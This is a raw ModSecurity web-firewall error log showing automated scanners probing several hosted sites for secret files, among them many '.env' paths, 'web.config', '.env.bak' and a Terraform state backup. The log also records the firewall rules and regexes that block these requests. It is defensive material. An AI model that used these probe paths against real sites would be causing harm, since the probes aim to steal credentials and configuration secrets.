[Tue May 26 13:04:27.354249 2026] [security2:error] [pid 485064:tid 485254] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-CQAAAME"]
[Tue May 26 13:04:27.396792 2026] [security2:error] [pid 485064:tid 485247] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-DAAAALo"]
[Tue May 26 13:04:27.406646 2026] [security2:error] [pid 485064:tid 485303] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-DwAAAPI"]
[Tue May 26 13:04:27.407191 2026] [security2:error] [pid 485064:tid 485244] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-EgAAALc"]
[Tue May 26 13:04:27.449515 2026] [security2:error] [pid 485064:tid 485282] [client 195.178.110.199:45664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/src/.env"] [unique_id "ahVNAz9tlF55stOmSqH-FgAAAN0"]
[Tue May 26 13:04:27.538370 2026] [security2:error] [pid 485064:tid 485283] [client 195.178.110.199:45650] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-GQAAAN4"]
[Tue May 26 13:04:27.556012 2026] [security2:error] [pid 485064:tid 485301] [client 195.178.110.199:42366] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-GgAAAPA"]
[Tue May 26 13:04:27.560191 2026] [security2:error] [pid 485064:tid 485270] [client 195.178.110.199:42436] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-HAAAANE"]
[Tue May 26 13:04:27.564155 2026] [security2:error] [pid 485064:tid 485263] [client 195.178.110.199:45780] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-GwAAAMo"]
[Tue May 26 13:04:27.567700 2026] [security2:error] [pid 485064:tid 485284] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-HwAAAN8"]
[Tue May 26 13:04:27.576647 2026] [security2:error] [pid 485064:tid 485297] [client 195.178.110.199:42348] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-IgAAAOw"]
[Tue May 26 13:04:27.593214 2026] [security2:error] [pid 485064:tid 485262] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-KAAAAMk"]
[Tue May 26 13:04:27.661285 2026] [security2:error] [pid 485064:tid 485087] [remote 51.91.98.45:33346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVNAz9tlF55stOmSqH-FwABARY"]
[Tue May 26 13:04:27.669246 2026] [security2:error] [pid 485064:tid 485196] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-MQAAAIc"]
[Tue May 26 13:04:27.715752 2026] [security2:error] [pid 485064:tid 485299] [client 195.178.110.199:45614] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/srv/.env"] [unique_id "ahVNAz9tlF55stOmSqH-NwAAAO4"]
[Tue May 26 13:04:27.720707 2026] [security2:error] [pid 485064:tid 485308] [client 195.178.110.199:45650] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-MgAAAPc"]
[Tue May 26 13:04:27.733216 2026] [security2:error] [pid 485064:tid 485261] [client 195.178.110.199:42366] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-MwAAAMg"]
[Tue May 26 13:04:27.822359 2026] [security2:error] [pid 485064:tid 485312] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-OgAAAPs"]
[Tue May 26 13:04:27.888636 2026] [security2:error] [pid 485064:tid 485214] [client 195.178.110.199:45692] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-QQAAAJk"]
[Tue May 26 13:04:27.894501 2026] [security2:error] [pid 485064:tid 485215] [client 195.178.110.199:45614] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-QwAAAJo"]
[Tue May 26 13:04:27.902050 2026] [security2:error] [pid 485064:tid 485213] [client 195.178.110.199:45650] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-RQAAAJg"]
[Tue May 26 13:04:27.915691 2026] [security2:error] [pid 485064:tid 485238] [client 195.178.110.199:42366] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-RwAAALE"]
[Tue May 26 13:04:27.946151 2026] [security2:error] [pid 485064:tid 485207] [client 195.178.110.199:42348] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-SAAAAJI"]
[Tue May 26 13:04:27.974091 2026] [security2:error] [pid 485064:tid 485250] [client 195.178.110.199:42382] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/stg/.env"] [unique_id "ahVNAz9tlF55stOmSqH-SwAAAL0"]
[Tue May 26 13:04:27.983477 2026] [security2:error] [pid 485064:tid 485304] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/shop/.env"] [unique_id "ahVNAz9tlF55stOmSqH-TAAAAPM"]
[Tue May 26 13:04:28.000702 2026] [security2:error] [pid 485064:tid 485254] [client 195.178.110.199:42442] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-SgAAAME"]
[Tue May 26 13:04:28.061033 2026] [security2:error] [pid 485064:tid 485251] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-VQAAAL4"]
[Tue May 26 13:04:28.072944 2026] [security2:error] [pid 485064:tid 485224] [client 195.178.110.199:45614] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-VgAAAKM"]
[Tue May 26 13:04:28.093639 2026] [security2:error] [pid 485064:tid 485212] [client 195.178.110.199:42348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/stripe/.env"] [unique_id "ahVNBD9tlF55stOmSqH-WwAAAJc"]
[Tue May 26 13:04:28.109398 2026] [security2:error] [pid 485064:tid 485259] [client 195.178.110.199:45780] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/stage/.env"] [unique_id "ahVNBD9tlF55stOmSqH-XQAAAMY"]
[Tue May 26 13:04:28.118325 2026] [security2:error] [pid 485064:tid 485209] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-WQAAAJQ"]
[Tue May 26 13:04:28.120463 2026] [security2:error] [pid 485064:tid 485282] [client 195.178.110.199:42436] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-WgAAAN0"]
[Tue May 26 13:04:28.142688 2026] [security2:error] [pid 485064:tid 485268] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/staging/.env"] [unique_id "ahVNBD9tlF55stOmSqH-awAAAM8"]
[Tue May 26 13:04:28.166162 2026] [security2:error] [pid 485064:tid 485283] [client 195.178.110.199:42382] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-XgAAAN4"]
[Tue May 26 13:04:28.208088 2026] [security2:error] [pid 485064:tid 485252] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-ggAAAL8"]
[Tue May 26 13:04:28.256260 2026] [security2:error] [pid 485064:tid 485248] [client 195.178.110.199:45664] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-jAAAALs"]
[Tue May 26 13:04:28.264883 2026] [security2:error] [pid 485064:tid 485197] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-jwAAAIg"]
[Tue May 26 13:04:28.273742 2026] [security2:error] [pid 485064:tid 485206] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-kgAAAJE"]
[Tue May 26 13:04:28.321319 2026] [security2:error] [pid 485064:tid 485196] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-mAAAAIc"]
[Tue May 26 13:04:28.433097 2026] [security2:error] [pid 485064:tid 485210] [client 195.178.110.199:45650] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/test/.env"] [unique_id "ahVNBD9tlF55stOmSqH-rQAAAJU"]
[Tue May 26 13:04:28.472095 2026] [security2:error] [pid 485064:tid 485221] [client 195.178.110.199:42348] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-sAAAAKA"]
[Tue May 26 13:04:28.489528 2026] [security2:error] [pid 485064:tid 485293] [client 195.178.110.199:45664] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-sgAAAOg"]
[Tue May 26 13:04:28.537597 2026] [security2:error] [pid 485064:tid 485238] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-uAAAALE"]
[Tue May 26 13:04:28.578084 2026] [security2:error] [pid 485064:tid 485304] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-vgAAAPM"]
[Tue May 26 13:04:28.620764 2026] [security2:error] [pid 485064:tid 485298] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-xAAAAO0"]
[Tue May 26 13:04:28.681645 2026] [security2:error] [pid 485064:tid 485295] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-zQAAAOo"]
[Tue May 26 13:04:28.689266 2026] [security2:error] [pid 485064:tid 485276] [client 195.178.110.199:45780] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVNBD9tlF55stOmSqH-0QAAANc"]
[Tue May 26 13:04:28.704969 2026] [security2:error] [pid 485064:tid 485277] [client 195.178.110.199:42436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/user/.env"] [unique_id "ahVNBD9tlF55stOmSqH-0gAAANg"]
[Tue May 26 13:04:28.804501 2026] [security2:error] [pid 485064:tid 485268] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-1gAAAM8"]
[Tue May 26 13:04:28.999361 2026] [security2:error] [pid 485064:tid 485236] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-5gAAAK8"]
[Tue May 26 13:04:29.072607 2026] [security2:error] [pid 485064:tid 485147] [remote 91.92.42.86:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "kingsclub.in"] [uri "/web.config"] [unique_id "ahVNBT9tlF55stOmSqH-7AABAFI"], referer: http://kingsclub.in/web.config
[Tue May 26 13:04:29.117317 2026] [security2:error] [pid 485064:tid 485151] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/db.php"] [unique_id "ahVNBT9tlF55stOmSqH-8QAA9lY"], referer: http://kingsclub.in/db.php
[Tue May 26 13:04:29.187601 2026] [security2:error] [pid 485064:tid 485254] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH-9QAAAME"]
[Tue May 26 13:04:29.232180 2026] [security2:error] [pid 485064:tid 485162] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/settings.php"] [unique_id "ahVNBT9tlF55stOmSqH_AQAAqmE"], referer: http://kingsclub.in/settings.php
[Tue May 26 13:04:29.234240 2026] [security2:error] [pid 485064:tid 485188] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/database.php"] [unique_id "ahVNBT9tlF55stOmSqH_AgAA4Xs"], referer: http://kingsclub.in/database.php
[Tue May 26 13:04:29.248411 2026] [security2:error] [pid 485064:tid 485300] [client 195.178.110.199:45538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH-_gAAAO8"]
[Tue May 26 13:04:29.274404 2026] [security2:error] [pid 485064:tid 485298] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_AAAAAO0"]
[Tue May 26 13:04:29.311415 2026] [security2:error] [pid 485064:tid 485222] [client 195.178.110.199:45664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/v2/.env"] [unique_id "ahVNBT9tlF55stOmSqH_CAAAAKE"]
[Tue May 26 13:04:29.313928 2026] [security2:error] [pid 485064:tid 485294] [client 195.178.110.199:42442] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_BwAAAOk"]
[Tue May 26 13:04:29.339225 2026] [security2:error] [pid 485064:tid 485279] [client 195.178.110.199:42450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/test.php"] [unique_id "ahVNBT9tlF55stOmSqH_DAAAANo"]
[Tue May 26 13:04:29.348503 2026] [security2:error] [pid 485064:tid 485282] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_CwAAAN0"]
[Tue May 26 13:04:29.357046 2026] [security2:error] [pid 485064:tid 485187] [remote 91.92.42.86:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "kingsclub.in"] [uri "/.env.bak"] [unique_id "ahVNBT9tlF55stOmSqH_DgAAtno"], referer: http://kingsclub.in/.env.bak
